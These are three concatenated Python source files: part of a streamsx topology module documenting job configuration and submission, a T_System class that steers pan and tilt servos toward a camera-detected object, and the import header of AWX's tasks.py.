jc.raw_overlay = {'edgeConfig': {'imageName':'py-sample-app', 'imageTag':'v1.0', 'baseImage':'streams-base-edge-python-el7:5.3.0.0'}}
jc.add(cfg)
submit(ContextTypes.EDGE, topo, cfg)
.. rubric:: EDGE configuration
The dict *edgeConfig* supports the following fields that are used for the image creation:
* **imageName** - [str] name of the image
* **imageTag** - [str] name of the image tag
* **baseImage** - [str] identify the name of the base image
* **pipPackages** - [list] identify one or more Python install packages that are to be included in the image.
* **rpms** - [list] identify one or more linux RPMs that are to be included in the image
* **locales** - [list] identify one or more locales that are to be included in the image. The first item in the list is the "default" locale. The locales are identified in the java format <language>_<county>_<variant>. Example: "en_US"
Example with adding pip packages and rpms::
jc.raw_overlay = {'edgeConfig': {'imageName': image_name, 'imageTag': image_tag, 'pipPackages':['pandas','numpy'], 'rpms':['atlas-devel']}}
"""
EDGE_BUNDLE = 'EDGE_BUNDLE'
"""Creates a Streams application bundle.
The `Topology` is compiled on build service running on IBM Cloud Pak for Data and the resultant Streams application bundle
(sab file) is downloaded.
.. note::
`EDGE_BUNDLE` is typically only used when diagnosing issues with applications for EDGE.
"""
class ConfigParams(object):
"""
Configuration options which may be used as keys in :py:func:`submit` `config` parameter.
"""
VCAP_SERVICES = 'topology.service.vcap'
"""Streaming Analytics service definitions including credentials in **VCAP_SERVICES** format.
Provides the connection credentials when connecting to a Streaming Analytics service
using context type :py:const:`~ContextTypes.STREAMING_ANALYTICS_SERVICE`.
The ``streaming-analytics`` service to use within the service definitions is identified
by name using :py:const:`SERVICE_NAME`.
The key overrides the environment variable **VCAP_SERVICES**.
The value can be:
* Path to a local file containing a JSON representation of the VCAP services information.
* Dictionary containing the VCAP services information.
.. seealso:: :ref:`sas-vcap`
"""
SERVICE_NAME = 'topology.service.name'
"""Streaming Analytics service name.
Selects the specific Streaming Analytics service from VCAP service definitions
defined by the the environment variable **VCAP_SERVICES** or the key :py:const:`VCAP_SERVICES` in the `submit` config.
.. seealso:: :ref:`sas-service-name`
"""
SPACE_NAME = 'topology.spaceName'
"""
Key for a deployment space on a Cloud Pak for Data, when submitted to :py:const:`DISTRIBUTED`.
When a space name is specified for an application submitted from a project in Cloud Pak for Data,
for example from a Jupyter notebook, the resulting job will not be associated with the project and can
therefore not be found within the project. The job will be associated with a deployment space instead.
When the specified space does not exist, it will be automatically created.
.. versionadded:: 1.17
"""
CP4D_URL = 'topology.cp4d_url'
"""
Key for specifying the URL of the Cloud Pak for Data, when submitted to :py:const:`DISTRIBUTED` from within a CP4D project
.. versionadded:: 1.17
"""
FORCE_REMOTE_BUILD = 'topology.forceRemoteBuild'
"""Force a remote build of the application.
When submitting to :py:const:`STREAMING_ANALYTICS_SERVICE` a local build of the Streams application bundle
will occur if the environment variable **STREAMS_INSTALL** is set. Setting this flag to `True` ignores the
local Streams install and forces the build to occur remotely using the service.
"""
JOB_CONFIG = 'topology.jobConfigOverlays'
"""
Key for a :py:class:`JobConfig` object representing a job configuration for a submission.
"""
STREAMS_CONNECTION = 'topology.streamsConnection'
"""
Key for a :py:class:`StreamsConnection` object for connecting to a running IBM Streams instance. Only supported for Streams 4.2, 4.3. Requires environment
variable ``STREAMS_INSTANCE_ID`` to be set.
"""
SSL_VERIFY = 'topology.SSLVerify'
"""
Key for the SSL verification value passed to `requests` as its ``verify``
option for distributed contexts. By default set to `True`.
.. note:: Only ``True`` or ``False`` is supported. Behaviour is undefined
when passing a path to a CA_BUNDLE file or directory with
certificates of trusted CAs.
.. versionadded:: 1.11
"""
SERVICE_DEFINITION = 'topology.service.definition'
"""Streaming Analytics service definition.
Identifies the Streaming Analytics service to use. The definition can be one of
* The `service credentials` copied from the `Service credentials` page of the service console (not the Streams console).
Credentials are provided in JSON format. They contain such as the API key and secret, as well as connection information for the service.
* A JSON object (`dict`) created from the `service credentials`, for example with `json.loads(service_credentials)`
* A JSON object (`dict`) of the form: ``{ "type": "streaming-analytics", "name": "service name", "credentials": ... }``
with the `service credentials` as the value of the ``credentials`` key. The value of the ``credentials`` key can
be a JSON object (`dict`) or a `str` copied from the `Service credentials` page of the service console.
This key takes precedence over :py:const:`VCAP_SERVICES` and :py:const:`SERVICE_NAME`.
.. seealso:: :ref:`sas-service-def`
"""
SC_OPTIONS = 'topology.sc.options'
"""
Options to be passed to IBM Streams sc command.
A topology is compiled into a Streams application
bundle (`sab`) using the SPL compiler ``sc``.
Additional options to be passed to ``sc``
may be set using this key. The value can be a
single string option (e.g. ``--c++std=c++11`` to select C++ 11 compilation)
or a list of strings for multiple options.
Setting ``sc`` options may be required when invoking SPL operators
directly or testing SPL applications.
.. warning::
Options that modify the requested submission context (e.g. setting
a different main composite) or deprecated options should not be specified.
.. versionadded:: 1.12.10
"""
_SPLMM_OPTIONS = 'topology.internal.splmm_options'
"""
TBD
"""
class JobConfig(object):
"""
Job configuration.
`JobConfig` allows configuration of job that will result from
submission of a :py:class:`Topology` (application).
A `JobConfig` is set in the `config` dictionary passed to :py:func:`~streamsx.topology.context.submit`
using the key :py:const:`~ConfigParams.JOB_CONFIG`. :py:meth:`~JobConfig.add` exists as a convenience
method to add it to a submission configuration.
A `JobConfig` can also be used when submitting a Streams application
bundle through the Streaming Analytics REST API method :py:meth:`~streamsx.rest_primitives.StreamingAnalyticsService.submit_job`.
Args:
job_name(str): The name that is assigned to the job. A job name must be unique within a Streasm instance
When set to `None` a system generated name is used.
job_group(str): The job group to use to control permissions for the submitted job.
preload(bool): Specifies whether to preload the job onto all resources in the instance, even if the job is
not currently needed on each. Preloading the job can improve PE restart performance if the PEs are
relocated to a new resource.
data_directory(str): Specifies the location of the optional data directory. The data directory is a path
within the cluster that is running the Streams instance.
tracing: Specify the application trace level. See :py:attr:`tracing`
space_name(str): Specifies the name of a deployment space on a CloudPak for Data system, which the job is associated with
Example::
# Submit a job with the name NewsIngester
cfg = {}
job_config = JobConfig(job_name='NewsIngester')
job_config.add(cfg)
context.submit('STREAMING_ANALYTICS_SERVICE', topo, cfg)
.. seealso:: `Job configuration overlays reference <https://www.ibm.com/support/knowledgecenter/en/SSCRJU_4.2.1/com.ibm.streams.ref.doc/doc/submitjobparameters.html>`_
"""
def __init__(self, job_name=None, job_group=None, preload=False, data_directory=None, tracing=None, space_name=None):
self.job_name = job_name
self.job_group = job_group
self.preload = preload
self.data_directory = data_directory
self.tracing = tracing
self._space_name = space_name
self._pe_count = None
self._raw_overlay = None
self._submission_parameters = dict()
self._comment = None
@staticmethod
def from_overlays(overlays):
"""Create a `JobConfig` instance from a full job configuration
overlays object.
All logical items, such as ``comment`` and ``job_name``, are
extracted from `overlays`. The remaining information in the
single job config overlay in ``overlays`` is set as ``raw_overlay``.
Args:
overlays(dict): Full job configuration overlays object.
Returns:
JobConfig: Instance representing logical view of `overlays`.
.. versionadded:: 1.9
"""
jc = JobConfig()
jc.comment = overlays.get('comment')
if 'jobConfigOverlays' in overlays:
if len(overlays['jobConfigOverlays']) >= 1:
jco = copy.deepcopy(overlays['jobConfigOverlays'][0])
# Now extract the logical information
if 'jobConfig' in jco:
_jc = jco['jobConfig']
jc.job_name = _jc.pop('jobName', None)
jc.job_group = _jc.pop('jobGroup', None)
jc.preload = _jc.pop('preloadApplicationBundles', False)
jc.data_directory = _jc.pop('dataDirectory', None)
jc.tracing = _jc.pop('tracing', None)
for sp in _jc.pop('submissionParameters', []):
jc.submission_parameters[sp['name']] = sp['value']
if not _jc:
del jco['jobConfig']
if 'deploymentConfig' in jco:
_dc = jco['deploymentConfig']
if 'manual' == _dc.get('fusionScheme'):
if 'fusionTargetPeCount' in _dc:
jc.target_pe_count = _dc.pop('fusionTargetPeCount')
if len(_dc) == 1:
del jco['deploymentConfig']
if jco:
jc.raw_overlay = jco
return jc
@property
def space_name(self):
"""
The deployment space of a Cloud Pak for Data that the job will be associated with.
"""
return self._space_name
@space_name.setter
def space_name(self, space_name):
self._space_name = space_name
@property
def tracing(self):
"""
Runtime application trace level.
The runtime application trace level can be a string with value ``error``, ``warn``, ``info``,
``debug`` or ``trace``.
In addition a level from Python ``logging`` module can be used in with ``CRITICAL`` and ``ERROR`` mapping
to ``error``, ``WARNING`` to ``warn``, ``INFO`` to ``info`` and ``DEBUG`` to ``debug``.
Setting tracing to `None` or ``logging.NOTSET`` will result in the job submission using the Streams instance
application trace level.
The value of ``tracing`` is the level as a string (``error``, ``warn``, ``info``, ``debug`` or ``trace``)
or None.
"""
return self._tracing
@tracing.setter
def tracing(self, level):
if level is None:
pass
elif level in {'error', 'warn', 'info', 'debug', 'trace'}:
pass
elif level == logging.CRITICAL or level == logging.ERROR:
level = 'error'
elif level == logging.WARNING:
level = 'warn'
elif level == logging.INFO:
level = 'info'
elif level == logging.DEBUG:
level = 'debug'
elif level == logging.NOTSET:
level = None
else:
raise ValueError("Tracing value {0} not supported.".format(level))
self._tracing = level
@property
def target_pe_count(self):
"""Target processing element count.
When submitted against a Streams instance `target_pe_count` provides
a hint to the scheduler as to how to partition the topology
across processing elements (processes) for the job execution. When a job
contains multiple processing elements (PEs) then the Streams scheduler can
distributed the PEs across the resources (hosts) running in the instance.
When set to ``None`` (the default) no hint is supplied to the scheduler.
The number of PEs in the submitted job will be determined by the scheduler.
The value is only a target and may be ignored when the topology contains
:py:meth:`~Stream.isolate` calls.
.. note::
Only supported in Streaming Analytics service and IBM Streams 4.2 or later.
"""
if self._pe_count is None:
return None
return int(self._pe_count)
@target_pe_count.setter
def target_pe_count(self, count):
if count is not None:
count = int(count)
if count < 1:
raise ValueError("target_pe_count must be greater than 0.")
self._pe_count = count
@property
def raw_overlay(self):
"""Raw Job Config Overlay.
A submitted job is configured using Job Config Overlay which
is represented as a JSON. `JobConfig` exposes Job Config Overlay
logically with properties such as ``job_name`` and ``tracing``.
This property (as a ``dict``) allows merging of the
configuration defined by this object and raw representation
of a Job Config Overlay. This can be used when a capability
of Job Config Overlay is not exposed logically through this class.
For example, the threading model can be set by::
jc = streamsx.topology.context.JobConfig()
jc.raw_overlay = {'deploymentConfig': {'threadingModel': 'manual'}}
Any logical items set by this object **overwrite** any set with
``raw_overlay``. For example this sets the job name to
to value set in the constructor (`DBIngest`) not the value
in ``raw_overlay`` (`Ingest`)::
jc = streamsx.topology.context.JobConfig(job_name='DBIngest')
jc.raw_overlay = {'jobConfig': {'jobName': 'Ingest'}}
.. note:: Contents of ``raw_overlay`` is a ``dict`` that is
must match a single Job Config Overlay and be serializable
as JSON to the correct format.
.. seealso:: `Job Config Overlay reference <https://www.ibm.com/support/knowledgecenter/en/SSCRJU_4.2.1/com.ibm.streams.ref.doc/doc/submitjobparameters.html>`_
.. versionadded:: 1.9
"""
return self._raw_overlay
@raw_overlay.setter
def raw_overlay(self, raw):
self._raw_overlay = raw
@property
def submission_parameters(self):
"""Job submission parameters.
Submission parameters values for the job. A `dict` object
that maps submission parameter names to values.
.. versionadded:: 1.9
"""
return self._submission_parameters
@property
def comment(self):
"""
Comment for job configuration.
The comment does not change the functionality of the job configuration.
Returns:
str: Comment text, `None` if it has not been set.
.. versionadded:: 1.9
"""
return self._comment
@comment.setter
def comment(self, value):
if value:
self._comment = str(value)
else:
self._comment = None
def add(self, config):
"""
Add this `JobConfig` into a submission configuration object.
Args:
config(dict): Submission configuration.
Returns:
dict: config.
"""
config[ConfigParams.JOB_CONFIG] = self
if self.space_name:
config[ConfigParams.SPACE_NAME] = self.space_name
return config
def as_overlays(self):
"""Return this job configuration as a complete job configuration overlays object.
Converts this job configuration into the full format supported by IBM Streams.
The returned `dict` contains:
* ``jobConfigOverlays`` key with an array containing a single job configuration overlay.
* an optional ``comment`` key containing the comment ``str``.
For example with this ``JobConfig``::
jc = JobConfig(job_name='TestIngester')
jc.comment = 'Test configuration'
jc.target_pe_count = 2
the returned `dict` would be::
{"comment": "Test configuration",
"jobConfigOverlays":
[{"jobConfig": {"jobName": "TestIngester"},
"deploymentConfig": {"fusionTargetPeCount": 2, "fusionScheme": "manual"}}]}
The returned overlays object can be saved as JSON in a file
using ``json.dump``. A file can be used with job submission
mechanisms that support a job config overlays file, such as
``streamtool submitjob`` or the IBM Streams console.
Example of saving a ``JobConfig`` instance as a file::
jc = JobConfig(job_name='TestIngester')
with open('jobconfig.json', 'w') as f:
json.dump(jc.as_overlays(), f)
Returns:
dict: Complete job configuration overlays object built from this object.
.. versionadded:: 1.9
"""
return self._add_overlays({})
def _add_overlays(self, config):
"""
Add this as a jobConfigOverlays JSON to config.
"""
if self._comment:
config['comment'] = self._comment
jco = {}
config["jobConfigOverlays"] = [jco]
if self._raw_overlay:
jco.update(self._raw_overlay)
jc = jco.get('jobConfig', {})
if self.job_name is not None:
jc["jobName"] = self.job_name
if self.job_group is not None:
jc["jobGroup"] = self.job_group
if self.data_directory is not None:
jc["dataDirectory"] = self.data_directory
if self.preload:
jc['preloadApplicationBundles'] = True
if self.tracing is not None:
jc['tracing'] = self.tracing
if self.submission_parameters:
sp = jc.get('submissionParameters', [])
for name in self.submission_parameters:
sp.append({'name': str(name), 'value': self.submission_parameters[name]})
jc['submissionParameters'] = sp
if jc:
jco["jobConfig"] = jc
if self.target_pe_count is not None and self.target_pe_count >= 1:
deployment = jco.get('deploymentConfig', {})
deployment.update({'fusionScheme' : 'manual', 'fusionTargetPeCount' : self.target_pe_count})
jco["deploymentConfig"] = deployment
return config
class SubmissionResult(object):
"""Passed back to the user after a call to submit.
Allows the user to use dot notation to access dictionary elements.
Example accessing result files when using :py:const:`~ContextTypes.BUNDLE`::
submission_result = submit(ContextTypes.BUNDLE, topology, config)
print(submission_result.bundlePath)
...
os.remove(submission_result.bundlePath)
os.remove(submission_result.jobConfigPath)
Result contains the generated toolkit location when using :py:const:`~ContextTypes.TOOLKIT`::
submission_result = submit(ContextTypes.TOOLKIT, topology, config)
print(submission_result.toolkitRoot)
Result when using :py:const:`~ContextTypes.DISTRIBUTED` depends if the `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance or if the `Topology` is compiled on build-service and submitted to an instance in Cloud Pak for Data::
submission_result = submit(ContextTypes.DISTRIBUTED, topology, config)
print(submission_result)
Result contains the generated `image`, `imageDigest`, `submitMetrics` (building the bundle), `submitImageMetrics` (building the image) when using :py:const:`~ContextTypes.EDGE`::
submission_result = submit(ContextTypes.EDGE, topology, config)
print(submission_result.image)
print(submission_result.imageDigest)
"""
def __init__(self, results):
self.results = results
self._submitter = None
@property
def job(self):
"""REST binding for the job associated with the submitted build.
Returns:
Job: REST binding for running job or ``None`` if connection information was not available or no job was submitted.
"""
if self._submitter and hasattr(self._submitter, '_job_access'):
return self._submitter._job_access()
return None
def cancel_job_button(self, description=None):
"""Display a button that will cancel the submitted job.
Used in a Jupyter IPython notebook to provide an interactive
mechanism to cancel a job submitted from the notebook.
Once clicked the button is disabled unless the cancel fails.
A job may be cancelled directly using::
submission_result = submit(ctx_type, topology, config)
submission_result.job.cancel()
Args:
description(str): Text used as the button description, defaults to value based upon the job name.
.. warning::
Behavior when called outside a notebook is undefined.
.. versionadded:: 1.12
"""
if not hasattr(self, 'jobId'):
return
try:
# Verify we are in a IPython env.
get_ipython() # noqa : F821
import ipywidgets as widgets
if not description:
description = 'Cancel job: '
description += self.name if hasattr(self, 'name') else self.job.name
button = widgets.Button(description=description,
button_style='danger',
layout=widgets.Layout(width='40%'))
out = widgets.Output()
vb = widgets.VBox([button, out])
@out.capture(clear_output=True)
def _cancel_job_click(b):
b.disabled=True
print('Cancelling job: id=' + str(self.job.id) + ' ...\n', flush=True)
try:
rc = self.job.cancel()
out.clear_output()
if rc:
print('Cancelled job: id=' + str(self.job.id) + ' : ' + self.job.name + '\n', flush=True)
else:
print('Job already cancelled: id=' + str(self.job.id) + ' : ' + self.job.name + '\n', flush=True)
except:
b.disabled=False
out.clear_output()
raise
button.on_click(_cancel_job_click)
display(vb) # noqa : F821
except:
pass
def __getattr__(self, key):
if key in self.__getattribute__("results"):
return self.results[key]
return self.__getattribute__(key)
def __setattr__(self, key, value):
if "results" in self.__dict__:
results = self.results
results[key] = value
else:
super(SubmissionResult, self).__setattr__(key, value)
def __getitem__(self, item):
return self.__getattr__(item)
def __setitem__(self, key, value):
return self.__setattr__(key, value)
def __delitem__(self, key):
if key in self.__getattribute__("results"):
del self.results[key]
return
self.__delattr__(key)
def __contains__(self, item):
return item in self.results
def __repr__(self):
r = copy.copy(self.results)
if 'streamsConnection' in r:
del r['streamsConnection']
return r.__repr__()
def _vcap_from_service_definition(service_def):
"""Turn a service definition into a vcap services
containing a single service.
"""
if 'credentials' in service_def:
credentials = service_def['credentials']
else:
credentials = service_def
service = {}
service['credentials'] = credentials if isinstance(credentials, dict) else json.loads(credentials)
service['name'] = _name_from_service_definition(service_def)
vcap = {'streaming-analytics': [service]}
return vcap
def _name_from_service_definition(service_def):
return service_def['name'] if 'credentials' in service_def else 'service'
class _SasBundleSubmitter(_BaseSubmitter):
"""
A submitter which supports the BUNDLE context
for Streaming Analytics service.
"""
def __init__(self, config, graph):
_BaseSubmitter.__init__(self, 'SAS_BUNDLE', config, graph)
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD) or \
not 'STREAMS_INSTALL' in os.environ
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_SasBundleSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
def run(topology, config=None, job_name=None, verify=None, ctxtype=ContextTypes.DISTRIBUTED):
"""
Run a topology in a distributed Streams instance.
Runs a topology using :py:func:`submit` with context type :py:const:`~ContextTypes.DISTRIBUTED` (by default). The result is running Streams job.
Args:
topology(Topology): Application topology to be run.
config(dict): Configuration for the build.
job_name(str): Optional job name. If set will override any job name in `config`.
verify: SSL verification used by requests when using a build service. Defaults to enabling SSL verification.
ctxtype(str): Context type for submission.
Returns:
2-element tuple containing
- **job** (*Job*): REST binding object for the running job or ``None`` if no job was submitted.
- **result** (*SubmissionResult*): value returned from ``submit``.
.. seealso:: :py:const:`~ContextTypes.DISTRIBUTED` for details on how to configure the Streams instance to use.
.. versionadded:: 1.14
"""
config = config.copy() if config else dict()
if job_name:
if ConfigParams.JOB_CONFIG in config:
# Ensure the original is not changed
jc = JobConfig.from_overlays(config[ConfigParams.JOB_CONFIG].as_overlays())
jc.job_name = job_name
jc.add(config)
else:
JobConfig(job_name=job_name).add(config)
if verify is not None:
config[ConfigParams.SSL_VERIFY] = verify
sr = submit(ctxtype, topology, config=config)
return sr.job, sr
|
__init__.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: locking_system
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's Target Locking System.
.. moduleauthor:: Cem Baybars GÜÇLÜ <cem.baybars@gmail.com>
"""
import threading
from math import pi
from t_system.motion.locking_system.collimator import Collimator
from t_system import arm
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class LockingSystem:
"""Class to define a target locking system of the t_system's motion ability.
This class provides necessary initiations and a function named :func:`t_system.motion.LockingSystem.lock`
for the provide move of servo motor during locking to the target.
"""
def __init__(self, args, frame_w_h, decider=None, init_angles=(pi/2, pi/3)):
"""Initialization method of :class:`t_system.motion.LockingSystem` class.
Args:
args: Command-line arguments.
frame_w_h (tuple): The tuple that is contain width and height info of the vision limits.
decider: decider object of Decider class.
init_angles: Initialization angle values for pan and tilt's servo motors as radian unit.
"""
self.frame_width = frame_w_h[0]
self.frame_height = frame_w_h[1]
self.frame_middle_x = self.frame_width / 2 - 1
self.frame_middle_y = self.frame_height / 2 - 1
self.decider = decider
self.current_k_fact = 0.01
self.pan = Collimator((args["ls_gpios"][0], args["ls_channels"][0]), self.frame_width, init_angles[0], False, use_ext_driver=args["ext_servo_driver"]) # pan means rotate right and left ways.
self.tilt = Collimator((args["ls_gpios"][1], args["ls_channels"][1]), self.frame_height, init_angles[1], False, use_ext_driver=args["ext_servo_driver"]) # tilt means rotate up and down ways.
self.current_target_obj_width = 0
self.locker = None
self.lock = None
self.check_error = None
self.get_physically_distance = None
self.scan_thread_stop = False
self.load_locker(args["AI"], args["non_moving_target"], args["arm_expansion"], init_angles)
def load_locker(self, ai, non_moving_target, arm_expansion, current_angles):
"""Method to set locking system's locker as given AI and target object status parameters.
Args:
ai (str): AI type that will using during locking the target.
non_moving_target (bool): Non-moving target flag.
arm_expansion (bool): Flag for the loading locker as expansion of the T_System's robotic arm.
current_angles (list): Current angles of the target locking system's collimators.
"""
if arm_expansion is False:
self.pan.restart(current_angles[0])
self.tilt.restart(current_angles[1])
if ai == "official_ai":
self.locker = self.OfficialAILocker(self)
self.lock = self.locker.lock
self.check_error = self.locker.check_error
self.get_physically_distance = self.locker.get_physically_distance
elif non_moving_target or arm_expansion:
self.locker = self.ArmExpansionLocker(self)
self.lock = self.locker.lock
self.get_physically_distance = self.locker.get_physically_distance
else:
self.locker = self.RegularLocker(self)
self.lock = self.locker.lock
self.get_physically_distance = self.locker.get_physically_distance
return [self.tilt.current_angle, self.pan.current_angle]
class OfficialAILocker:
"""Class to define a official AI method of the t_system's motion ability.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.OfficialAILocker.lock`
for the provide move of servo motor during locking to the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.OfficialAILocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
self.decider = self.root_system.decider
self.current_k_fact = 0.01
self.current_target_obj_width = 0
if arm.is_expanded():
self.root_system.pan.restart()
self.root_system.tilt.restart()
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top left point of found object from haarcascade.
y : the row number of the top left point of found object from haarcascade.
w : the width of found object from haarcascade.
h : the height of found object from haarcascade.
"""
# obj_width is equal to w
self.current_target_obj_width = w
self.current_k_fact = self.__get_k_fact(w)
self.root_system.pan.move(x, x + w, w, self.current_k_fact)
self.root_system.tilt.move(y, y + h, w, self.current_k_fact)
def check_error(self, ex, ey, ew, eh):
"""Method for checking error during locking to the target in the frame.
Args:
ex : the column number of the top left point of found object from haarcascade.
ey : the row number of the top left point of found object from haarcascade.
ew : the width of found object from haarcascade.
eh : the height of found object from haarcascade.
"""
err_rate_pan = float(self.root_system.pan.current_dis_to_des(ex, ex + ew) / self.root_system.pan.get_previous_dis_to_des()) * 100
err_rate_tilt = float(self.root_system.tilt.current_dis_to_des(ey, ey + eh) / self.root_system.tilt.get_previous_dis_to_des()) * 100
self.decider.decision(self.current_target_obj_width, err_rate_pan, True)
self.decider.decision(self.current_target_obj_width, err_rate_tilt, True)
def __get_k_fact(self, obj_width):
"""Method to getting necessary k_fact by given object width.
Args:
obj_width (int): Width of the found object from haarcascade for measurement inferencing.
"""
return self.decider.decision(obj_width)
def get_physically_distance(self, obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
return obj_width / self.current_k_fact # physically distance is equal to obj_width / k_fact.
class RegularLocker:
"""Class to define a basic object tracking method of the t_system's motion ability.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.RegularLocker.lock`
for the provide move of servo motor during locking to the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.RegularLocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top left point of found object from haarcascade.
y : the row number of the top left point of found object from haarcascade.
w : the width of found object from haarcascade.
h : the height of found object from haarcascade.
"""
precision_ratio = 0.2
obj_middle_x = x + w / 2 # middle point's x axis coordinate of detected object
obj_middle_y = y + h / 2 # middle point's y axis coordinate of detected object
if obj_middle_x < self.root_system.frame_middle_x - self.root_system.frame_middle_x * precision_ratio:
self.root_system.pan.move(False, True) # last parameter True is for the clockwise and False is can't clockwise direction
elif obj_middle_x > self.root_system.frame_middle_x + self.root_system.frame_middle_x * precision_ratio:
self.root_system.pan.move(False, False) # First parameter is the stop flag.
else:
self.root_system.pan.move(True, False)
if obj_middle_y < self.root_system.frame_middle_y - self.root_system.frame_middle_y * precision_ratio:
self.root_system.tilt.move(False, True) # last parameter True is for the clockwise and False is can't clockwise direction
elif obj_middle_y > self.root_system.frame_middle_y + self.root_system.frame_middle_y * precision_ratio:
self.root_system.tilt.move(False, False) # First parameter is the stop flag.
else:
self.root_system.tilt.move(True, False)
@staticmethod
def get_physically_distance(obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
kp = 28.5823 # gain rate with the width of object and physically distance.
return obj_width * kp # physically distance is equal to obj_width * kp in px unit. 1 px length is equal to 0.164 mm
class ArmExpansionLocker:
"""Class to define a locker as an extension of robotic arm of the t_system's motion ability. For focused non-moving point tracking or emotion showing.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.ArmExpansionLocker.lock`
for the provide move of servo motor during locking to the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.ArmExpansionLocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
if not arm.is_expanded():
self.root_system.stop()
self.root_system.gpio_cleanup()
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top left point of found object from haarcascade.
y : the row number of the top left point of found object from haarcascade.
w : the width of found object from haarcascade.
h : the height of found object from haarcascade.
"""
pass
@staticmethod
def get_physically_distance(obj_width):
"""Method to provide return the tracking object's physically distance value.
"""
kp = 28.5823 # gain rate with the width of object and physically distance.
return obj_width * kp # physically distance is equal to obj_width * kp in px unit. 1 px length is equal to 0.164 mm
def scan(self, stop):
"""Method to scan around for detecting the object that will be locked before lock process.
Args:
stop: Stop flag of the tread about terminating it outside of the function's loop.
"""
self.scan_thread_stop = stop
threading.Thread(target=self.__scan).start()
def __scan(self):
"""Method to cycle collimator respectively clockwise and can't clockwise.
"""
precision_ratio = 0.95
while not self.scan_thread_stop:
while not self.tilt.current_angle >= self.tilt.max_angle * precision_ratio and not self.scan_thread_stop:
self.tilt.move(False, 5, 30)
while not self.pan.current_angle >= self.pan.max_angle * precision_ratio and not self.scan_thread_stop:
self.pan.move(False, 2, 30)
self.tilt.move(False, 5, 30)
while not self.pan.current_angle <= self.pan.min_angle / precision_ratio and not self.scan_thread_stop:
self.pan.move(True, 2, 30)
while not self.tilt.current_angle <= self.tilt.min_angle / precision_ratio and not self.scan_thread_stop:
self.tilt.move(True, 5, 30)
while not self.pan.current_angle >= self.pan.max_angle * precision_ratio and not self.scan_thread_stop:
self.pan.move(False, 2, 30)
self.tilt.move(True, 5, 30)
while not self.pan.current_angle <= self.pan.min_angle / precision_ratio and not self.scan_thread_stop:
self.pan.move(True, 2, 30)
self.scan_thread_stop = False
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the locking system's servo motors.
"""
self.pan.stop()
self.tilt.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the locking system's servo motors
"""
self.pan.gpio_cleanup()
self.tilt.gpio_cleanup()
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
from io import StringIO
from contextlib import redirect_stdout
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
import ansible_runner.cleanup
# dateutil
from dateutil.parser import parse as parse_date
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS, JOB_FOLDER_PREFIX
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils.common import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
create_partition,
)
from awx.main.utils.execution_environments import get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.utils.receptor import get_receptor_ctl, worker_info, get_conn_type, get_tls_client, worker_cleanup
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
